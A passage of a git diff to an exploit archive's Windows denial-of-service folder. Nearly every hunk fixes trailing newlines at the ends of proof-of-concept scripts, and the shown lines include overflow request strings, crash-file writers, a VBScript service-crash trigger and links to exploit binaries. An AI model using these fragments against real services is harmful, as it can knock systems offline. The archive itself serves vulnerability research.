b/platforms/windows/dos/19332.txt index 8e7715197..6d5314d51 100755 --- a/platforms/windows/dos/19332.txt +++ b/platforms/windows/dos/19332.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-21.pct -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19332.pct +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19332.pct \ No newline at end of file diff --git a/platforms/windows/dos/19333.txt b/platforms/windows/dos/19333.txt index b0265e3cc..0f51a12b6 100755 --- a/platforms/windows/dos/19333.txt +++ b/platforms/windows/dos/19333.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-20.gif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19333.gif +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19333.gif \ No newline at end of file diff --git a/platforms/windows/dos/19334.txt b/platforms/windows/dos/19334.txt index 30ea01549..3b9dd2676 100755 --- a/platforms/windows/dos/19334.txt +++ b/platforms/windows/dos/19334.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-19.cur -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19334.cur +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19334.cur \ No newline at end of file diff --git a/platforms/windows/dos/19335.txt b/platforms/windows/dos/19335.txt index 108b046b8..47078d555 100755 --- a/platforms/windows/dos/19335.txt +++ b/platforms/windows/dos/19335.txt @@ -61,5 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-18.gif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19335.gif - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19335.gif \ No newline at end of file diff --git a/platforms/windows/dos/19336.txt b/platforms/windows/dos/19336.txt index 935d92ccf..1ba4b7eae 100755 --- a/platforms/windows/dos/19336.txt +++ b/platforms/windows/dos/19336.txt @@ -61,5 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-17.pct -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19336.pct - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19336.pct \ No newline at end of file diff --git a/platforms/windows/dos/19337.txt b/platforms/windows/dos/19337.txt index 21325b47f..cb4a8bace 100755 --- a/platforms/windows/dos/19337.txt +++ b/platforms/windows/dos/19337.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-16.tiff -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19337.tiff +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19337.tiff \ No newline at end of file diff --git a/platforms/windows/dos/19338.txt b/platforms/windows/dos/19338.txt index c66460b81..3c2849673 100755 --- a/platforms/windows/dos/19338.txt +++ b/platforms/windows/dos/19338.txt @@ -61,5 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-15.tif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19338.tif - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19338.tif \ No newline at end of file diff --git a/platforms/windows/dos/1935.cpp b/platforms/windows/dos/1935.cpp index 5369f9162..2cbc4d0ff 100755 --- a/platforms/windows/dos/1935.cpp +++ b/platforms/windows/dos/1935.cpp @@ -65,4 +65,4 @@ void usage(char* file) exit(1); } -// milw0rm.com [2006-06-20] +// milw0rm.com [2006-06-20] \ No newline at end of file diff --git a/platforms/windows/dos/19372.txt b/platforms/windows/dos/19372.txt index 83b010a29..9bbc8a6fc 100755 --- a/platforms/windows/dos/19372.txt +++ b/platforms/windows/dos/19372.txt @@ -278,6 +278,4 @@ NetApiBufferFree(pUserbuf); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/19385.txt b/platforms/windows/dos/19385.txt index 4a07689c9..592596df1 100755 --- a/platforms/windows/dos/19385.txt +++ b/platforms/windows/dos/19385.txt @@ -55,4 +55,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-23.djvu -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19385.djvu +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19385.djvu \ No newline at end of file diff --git a/platforms/windows/dos/19388.py b/platforms/windows/dos/19388.py index 82cc8e4de..050315c51 100755 --- a/platforms/windows/dos/19388.py +++ b/platforms/windows/dos/19388.py @@ -48,4 +48,4 @@ CALL TO STACK USER32!GetDC+0x6d USER32!EnumDisplaySettingsA+0x27d USER32!EnumDisplaySettingsA+0xc9 -USER32!DefDlgProcA+0x22 +USER32!DefDlgProcA+0x22 \ No newline at end of file diff --git a/platforms/windows/dos/19389.txt b/platforms/windows/dos/19389.txt index 3b3431340..6bd5abe21 100755 --- a/platforms/windows/dos/19389.txt +++ b/platforms/windows/dos/19389.txt @@ -107,5 +107,4 @@ ds:0023:42424252=???????? 7c91b203 8945e8 mov dword ptr [ebp-18h],eax -ntdll!RtlpWaitForCriticalSection+0x5b - +ntdll!RtlpWaitForCriticalSection+0x5b \ No newline at end of file diff --git a/platforms/windows/dos/19391.py b/platforms/windows/dos/19391.py index e25f6da9e..0f6544038 100755 --- a/platforms/windows/dos/19391.py +++ b/platforms/windows/dos/19391.py @@ -14,4 +14,4 @@ pdf=payload+crash filename = "slimpdPoC.pdf" file = open(filename,"w") file.writelines(pdf) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/19392.py b/platforms/windows/dos/19392.py index c01273c99..1b24f3166 100755 --- a/platforms/windows/dos/19392.py +++ b/platforms/windows/dos/19392.py @@ -15,4 +15,4 @@ pdf=payload+crash filename = "slimpdPoC.pdf" file = open(filename,"w") file.writelines(pdf) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/19393.py b/platforms/windows/dos/19393.py index 20d2842f2..9228635b6 100755 --- a/platforms/windows/dos/19393.py +++ b/platforms/windows/dos/19393.py @@ -14,4 +14,4 @@ pdf=payload+crash filename = "slimpdPoC.pdf" file = open(filename,"w") file.writelines(pdf) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/19413.c b/platforms/windows/dos/19413.c index 3c041dd67..082a949ce 100755 --- a/platforms/windows/dos/19413.c +++ b/platforms/windows/dos/19413.c @@ -186,4 +186,4 @@ int main(int argc, char *argv[]) } printf("\n"); fflush(stdout); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/19414.c b/platforms/windows/dos/19414.c index 15ef3d4af..e792f9daa 100755 --- a/platforms/windows/dos/19414.c +++ b/platforms/windows/dos/19414.c @@ -171,5 +171,4 @@ unsigned short in_chksum(unsigned short *addr, int len) sum += (sum >> 16); answer = ~sum; return(answer); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/19415.c b/platforms/windows/dos/19415.c index 01446c5e7..821f70468 100755 --- a/platforms/windows/dos/19415.c +++ b/platforms/windows/dos/19415.c @@ -123,5 +123,4 @@ u_long resolve(char *host) } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/19489.txt b/platforms/windows/dos/19489.txt index ae5287075..557471bdf 100755 --- a/platforms/windows/dos/19489.txt +++ b/platforms/windows/dos/19489.txt @@ -12,6 +12,4 @@ registry key and add a new value, "LocalService", with data SENS Create an HTML document, with the following VBScript in it: <SCRIPT LANGUAGE="VBScript"> CreateObject("Wordpad.Document.1") </SCRIPT> -Open the html document in a browser. The browser will request that the COM Service Control Manager (RPCSS.EXE) start the service associated with Wordpad. - - +Open the html document in a browser. The browser will request that the COM Service Control Manager (RPCSS.EXE) start the service associated with Wordpad. \ No newline at end of file diff --git a/platforms/windows/dos/1949.pl b/platforms/windows/dos/1949.pl index cdd3abc9e..2e3838432 100755 --- a/platforms/windows/dos/1949.pl +++ b/platforms/windows/dos/1949.pl @@ -28,4 +28,4 @@ else { Jerome Athias\nhttps://www.securinfos.info\n\n- Usage: $0 host\n"; } -# milw0rm.com [2006-06-24] +# milw0rm.com [2006-06-24] \ No newline at end of file diff --git a/platforms/windows/dos/19569.pl b/platforms/windows/dos/19569.pl index c259d4138..e607c63e6 100755 --- a/platforms/windows/dos/19569.pl +++ b/platforms/windows/dos/19569.pl @@ -244,5 +244,4 @@ print qq~ [13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25 -~; exit; } - +~; exit; } \ No newline at end of file diff --git a/platforms/windows/dos/19575.txt b/platforms/windows/dos/19575.txt index ed68d9d33..c847161fa 100755 --- a/platforms/windows/dos/19575.txt +++ b/platforms/windows/dos/19575.txt @@ -200,4 +200,4 @@ We do not accept any responsibility for bad usage of this PoC. Please only run i <br/><br/> Main reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/19577.py b/platforms/windows/dos/19577.py index 6a50078c5..2ab221f65 100755 --- a/platforms/windows/dos/19577.py +++ b/platforms/windows/dos/19577.py @@ -158,4 +158,4 @@ if __name__ == '__main__': main(sys.argv[1]) print 'done.' ---82I3+IH0IqGh5yIs-- +--82I3+IH0IqGh5yIs-- \ No newline at end of file diff --git a/platforms/windows/dos/19616.c b/platforms/windows/dos/19616.c index d4adf5199..6206a6fe2 100755 --- a/platforms/windows/dos/19616.c +++ b/platforms/windows/dos/19616.c @@ -160,5 +160,4 @@ int main(int argc, char *argv[]) closesocket(sockfd); WSACleanup(); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/19624.txt b/platforms/windows/dos/19624.txt index 169c5ebb0..12d497f2e 100755 --- a/platforms/windows/dos/19624.txt +++ b/platforms/windows/dos/19624.txt @@ -7,5 +7,4 @@ Binary - 19624-2.exe https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19624-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19624-2.exe - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19624-2.exe \ No newline at end of file diff --git a/platforms/windows/dos/19638.c b/platforms/windows/dos/19638.c index 5a231379b..95d2eacbb 100755 --- a/platforms/windows/dos/19638.c +++ b/platforms/windows/dos/19638.c @@ -60,5 +60,4 @@ sockaddr)) == -1) { close(sockfd); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/1967.c b/platforms/windows/dos/1967.c index 18a663bbb..9cc431872 100755 --- a/platforms/windows/dos/1967.c +++ b/platforms/windows/dos/1967.c @@ -129,4 +129,4 @@ system(ping); } -// milw0rm.com [2006-06-30] +// milw0rm.com [2006-06-30] \ No newline at end of file diff --git a/platforms/windows/dos/19716.txt b/platforms/windows/dos/19716.txt index a59ae1bca..1c993c4f7 100755 --- a/platforms/windows/dos/19716.txt +++ b/platforms/windows/dos/19716.txt @@ -237,4 +237,4 @@ end; ############################################################################# -Possible implementation of a phishing attack by modifying the file etc \ hosts host system, all changes in it are also automatically applied for the secure session. +Possible implementation of a phishing attack by modifying the file etc \ hosts host system, all changes in it are also automatically applied for the secure session. \ No newline at end of file diff --git a/platforms/windows/dos/19720.c b/platforms/windows/dos/19720.c index 7dc8ae0cc..b4cf0286f 100755 --- a/platforms/windows/dos/19720.c +++ b/platforms/windows/dos/19720.c @@ -62,4 +62,4 @@ fprintf(file, "\nNumberOfEntries=1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/19740.c b/platforms/windows/dos/19740.c index e1f95c4f4..aa9248afe 100755 --- a/platforms/windows/dos/19740.c +++ b/platforms/windows/dos/19740.c @@ -87,4 +87,4 @@ void main(int argc,char *argv[]) closesocket(sock); WSACleanup(); printf("done.\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/1976.cpp b/platforms/windows/dos/1976.cpp index 5b2561713..b6c91d9a7 100755 --- a/platforms/windows/dos/1976.cpp +++ b/platforms/windows/dos/1976.cpp @@ -80,4 +80,4 @@ bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved) return 1; } -// milw0rm.com [2006-07-02] +// milw0rm.com [2006-07-02] \ No newline at end of file diff --git a/platforms/windows/dos/19772.txt b/platforms/windows/dos/19772.txt index 7fade5b3d..9e3345295 100755 --- a/platforms/windows/dos/19772.txt +++ b/platforms/windows/dos/19772.txt @@ -1541,4 +1541,4 @@ my $crafted = open(C, ">", "crafted.wav"); print C $crafted; -close(C); +close(C); \ No newline at end of file diff --git a/platforms/windows/dos/19782.pl b/platforms/windows/dos/19782.pl index e2a99d79e..5c7781975 100755 --- a/platforms/windows/dos/19782.pl +++ b/platforms/windows/dos/19782.pl @@ -31,4 +31,4 @@ for ($y=1 ; $y<2500000 ; $y++) { select STDOUT; send S,"OMNIBACK HAS SOME BIG ISSUES",0; } -print "ATTACK COMPLETED!\n"; +print "ATTACK COMPLETED!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1980.pl b/platforms/windows/dos/1980.pl index d79f93308..d7cc422be 100755 --- a/platforms/windows/dos/1980.pl +++ b/platforms/windows/dos/1980.pl @@ -46,4 +46,4 @@ $req->content('match=www&errors=0'); my $res = $ua->request($req); print $res->as_string; -# milw0rm.com [2006-07-04] +# milw0rm.com [2006-07-04] \ No newline at end of file diff --git a/platforms/windows/dos/19806.c b/platforms/windows/dos/19806.c index 306b3bbab..cb47e1719 100755 --- a/platforms/windows/dos/19806.c +++ b/platforms/windows/dos/19806.c @@ -146,4 +146,4 @@ buffer); } return (0); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/1984.py b/platforms/windows/dos/1984.py index bd4962f48..8a6e25f22 100755 --- a/platforms/windows/dos/1984.py +++ b/platforms/windows/dos/1984.py @@ -129,4 +129,4 @@ except OSError: print "failed!" sys.exit("Error: application execution failed!") -# milw0rm.com [2006-07-05] +# milw0rm.com [2006-07-05] \ No newline at end of file diff --git a/platforms/windows/dos/19843.java b/platforms/windows/dos/19843.java index 5bb209eb2..ed9f068ec 100755 --- a/platforms/windows/dos/19843.java +++ b/platforms/windows/dos/19843.java @@ -53,4 +53,4 @@ kk.adress = arguments[0]; kk.killken(); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/1989.html b/platforms/windows/dos/1989.html index d8f04495c..4b4e2dd97 100755 --- a/platforms/windows/dos/1989.html +++ b/platforms/windows/dos/1989.html @@ -35,4 +35,4 @@ Clicking the button below may crash your browser!<br><br> </body></html> -# milw0rm.com [2006-07-07] +# milw0rm.com [2006-07-07] \ No newline at end of file diff --git a/platforms/windows/dos/1990.html b/platforms/windows/dos/1990.html index 148e5f76d..9744ae951 100755 --- a/platforms/windows/dos/1990.html +++ b/platforms/windows/dos/1990.html @@ -46,4 +46,4 @@ Clicking the button below may crash your browser!<br><br> </body></html> -# milw0rm.com [2006-07-07] +# milw0rm.com [2006-07-07] \ No newline at end of file diff --git a/platforms/windows/dos/19940.c b/platforms/windows/dos/19940.c index 7c19a2e19..1ef10ff2d 100755 --- a/platforms/windows/dos/19940.c +++ b/platforms/windows/dos/19940.c @@ -69,4 +69,4 @@ int main(int argc, char **argv) { printf("Packets sent\n"); - return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);} + return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);} \ No newline at end of file diff --git a/platforms/windows/dos/19941.casl b/platforms/windows/dos/19941.casl index 734da7d3a..62ff309e8 100755 --- a/platforms/windows/dos/19941.casl +++ b/platforms/windows/dos/19941.casl @@ -77,4 +77,4 @@ pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0"; packet = [ iph2, tch2, pk2data ]; -ip_output(packet); +ip_output(packet); \ No newline at end of file diff --git a/platforms/windows/dos/19961.txt b/platforms/windows/dos/19961.txt index 47b281c99..a0defab80 100755 --- a/platforms/windows/dos/19961.txt +++ b/platforms/windows/dos/19961.txt @@ -54,5 +54,4 @@ exploited to cause a stack-based buffer overflow via a specially crafted file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-25.lwp -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19961.lwp - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19961.lwp \ No newline at end of file diff --git a/platforms/windows/dos/19962.txt b/platforms/windows/dos/19962.txt index 5e2a06c02..5a066d5e5 100755 --- a/platforms/windows/dos/19962.txt +++ b/platforms/windows/dos/19962.txt @@ -55,5 +55,4 @@ crafted JPEG2000 (JP2) file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-24.jp2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19962.jp2 - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19962.jp2 \ No newline at end of file diff --git a/platforms/windows/dos/19974.c b/platforms/windows/dos/19974.c index ca0b2c0a2..820f53a2d 100755 --- a/platforms/windows/dos/19974.c +++ b/platforms/windows/dos/19974.c @@ -72,5 +72,4 @@ int main(int argc, char *argv[]) { for (;;) { read(sock, buf, sizeof(buf)); } -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/19986.txt b/platforms/windows/dos/19986.txt index 0070af59b..75454ec98 100755 --- a/platforms/windows/dos/19986.txt +++ b/platforms/windows/dos/19986.txt @@ -84,4 +84,4 @@ Risk Factor: Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this -vulnerability. +vulnerability. \ No newline at end of file diff --git a/platforms/windows/dos/19988.pl b/platforms/windows/dos/19988.pl index 82860412e..ce7ebbd9b 100755 --- a/platforms/windows/dos/19988.pl +++ b/platforms/windows/dos/19988.pl @@ -71,5 +71,4 @@ print $sock "GET /" . "*" x 2450 . "C" x 528 . " HTTP/1.0\r\n" . "Host: $host" . "\r\n\r\n" ; -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/19994.c b/platforms/windows/dos/19994.c index cdb6ce2d8..53154939d 100755 --- a/platforms/windows/dos/19994.c +++ b/platforms/windows/dos/19994.c @@ -168,4 +168,4 @@ int main(int argc, char *argv[]) quit("IP_HDRINCL"); do_frags (spf_sck, src_addr, dst_addr, port); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20005.c b/platforms/windows/dos/20005.c index 04899c7c7..e3317461a 100755 --- a/platforms/windows/dos/20005.c +++ b/platforms/windows/dos/20005.c @@ -520,5 +520,4 @@ int main(argc, argv) WSACleanup(); #endif return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/20006.nasl b/platforms/windows/dos/20006.nasl index 3625e3d32..98c9958c6 100755 --- a/platforms/windows/dos/20006.nasl +++ b/platforms/windows/dos/20006.nasl @@ -631,4 +631,4 @@ if(value) security_hole(139); exit(0); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/2001.c b/platforms/windows/dos/2001.c index eb7cd53d8..a4139ceb7 100755 --- a/platforms/windows/dos/2001.c +++ b/platforms/windows/dos/2001.c @@ -2687,4 +2687,4 @@ int main() } //--- -// milw0rm.com [2006-07-10] +// milw0rm.com [2006-07-10] \ No newline at end of file diff --git a/platforms/windows/dos/20039.java b/platforms/windows/dos/20039.java index 47300ac29..f8ccd9e97 100755 --- a/platforms/windows/dos/20039.java +++ b/platforms/windows/dos/20039.java @@ -40,4 +40,4 @@ static void main(String[] args) throws IOException, UnknownHostException { white.println("."); if (white.checkError()) { System.out.println("Crashed"); - break; } } } } + break; } } } } \ No newline at end of file diff --git a/platforms/windows/dos/20051.c b/platforms/windows/dos/20051.c index 46d2ea5ed..be7f616ae 100755 --- a/platforms/windows/dos/20051.c +++ b/platforms/windows/dos/20051.c @@ -35,5 +35,4 @@ int main (int argc, char **argv) sizeof(struct sockaddr_in)); printf("Sent Crash.\nBytes Sent: %i\n",bsent); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/20054.pl b/platforms/windows/dos/20054.pl index c464152eb..8fca8cfbe 100755 --- a/platforms/windows/dos/20054.pl +++ b/platforms/windows/dos/20054.pl @@ -34,4 +34,4 @@ print S "$buf"; print("Data has been successfully sent to $serv\n"); -sub usage {die("\n\n$0 -s <server>\n\n");} +sub usage {die("\n\n$0 -s <server>\n\n");} \ No newline at end of file diff --git a/platforms/windows/dos/20069.pl b/platforms/windows/dos/20069.pl index 15a5282d7..e867e246c 100755 --- a/platforms/windows/dos/20069.pl +++ b/platforms/windows/dos/20069.pl @@ -47,4 +47,4 @@ while ($time < $wait) { # Finished. close($socket); -print "\nConnection closed. Finished.\n" +print "\nConnection closed. Finished.\n" \ No newline at end of file diff --git a/platforms/windows/dos/20099.c b/platforms/windows/dos/20099.c index 3107f2c9f..704cd00a3 100755 --- a/platforms/windows/dos/20099.c +++ b/platforms/windows/dos/20099.c @@ -152,4 +152,4 @@ main(int argc, char *argv[]) printf("Invalid type value (max type=%d)\n",i); printf("Type %s for more information :)\n\n",argv[0]); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20100.pl b/platforms/windows/dos/20100.pl index fec1bb450..e954131f8 100755 --- a/platforms/windows/dos/20100.pl +++ b/platforms/windows/dos/20100.pl @@ -51,4 +51,4 @@ while ($time < $wait) { # Finished. close($socket); -print "\nConnection closed. Finished.\n" +print "\nConnection closed. Finished.\n" \ No newline at end of file diff --git a/platforms/windows/dos/20101.pl b/platforms/windows/dos/20101.pl index da932b6a8..81ca7578b 100755 --- a/platforms/windows/dos/20101.pl +++ b/platforms/windows/dos/20101.pl @@ -52,4 +52,4 @@ while ($time < $wait) { # Finished. close($socket); -print "\nConnection closed. Finished.\n" +print "\nConnection closed. Finished.\n" \ No newline at end of file diff --git a/platforms/windows/dos/20102.pl b/platforms/windows/dos/20102.pl index 6fe908cb2..868f76254 100755 --- a/platforms/windows/dos/20102.pl +++ b/platforms/windows/dos/20102.pl @@ -48,4 +48,4 @@ while ($time < $wait) { # Finished. close($socket); -print "\nConnection closed. Finished.\n" +print "\nConnection closed. Finished.\n" \ No newline at end of file diff --git a/platforms/windows/dos/20225.pl b/platforms/windows/dos/20225.pl index f5aea7dce..4d6c35b09 100755 --- a/platforms/windows/dos/20225.pl +++ b/platforms/windows/dos/20225.pl @@ -241,5 +241,4 @@ print qq~ [13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25 -~; exit; } - +~; exit; } \ No newline at end of file diff --git a/platforms/windows/dos/20233.txt b/platforms/windows/dos/20233.txt index dcbc7c000..f2f86aa22 100755 --- a/platforms/windows/dos/20233.txt +++ b/platforms/windows/dos/20233.txt @@ -12,4 +12,4 @@ Referer: http://referrer/(8 KB string of characters)<cr> UserAgent: Browser 1.1<cr> <cr><cr> -will cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality. +will cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality. \ No newline at end of file diff --git a/platforms/windows/dos/20255.txt b/platforms/windows/dos/20255.txt index 465d98b8e..214823e22 100755 --- a/platforms/windows/dos/20255.txt +++ b/platforms/windows/dos/20255.txt @@ -9,4 +9,4 @@ This vulnerability can only be launched against a machine a user can interactive start porttool -s6 \BaseNamedObjects\Foo porttool -c6 \BaseNamedObject\Foo -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20255.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20255.zip \ No newline at end of file diff --git a/platforms/windows/dos/20272.pl b/platforms/windows/dos/20272.pl index c16f316c2..b008cdf20 100755 --- a/platforms/windows/dos/20272.pl +++ b/platforms/windows/dos/20272.pl @@ -82,4 +82,4 @@ send Socket_Handle,"\n",0; while (<Socket_Handle>) { print $_; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/20295.txt b/platforms/windows/dos/20295.txt index aff53524f..108b7b97b 100755 --- a/platforms/windows/dos/20295.txt +++ b/platforms/windows/dos/20295.txt @@ -207,4 +207,4 @@ rgod SRC="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa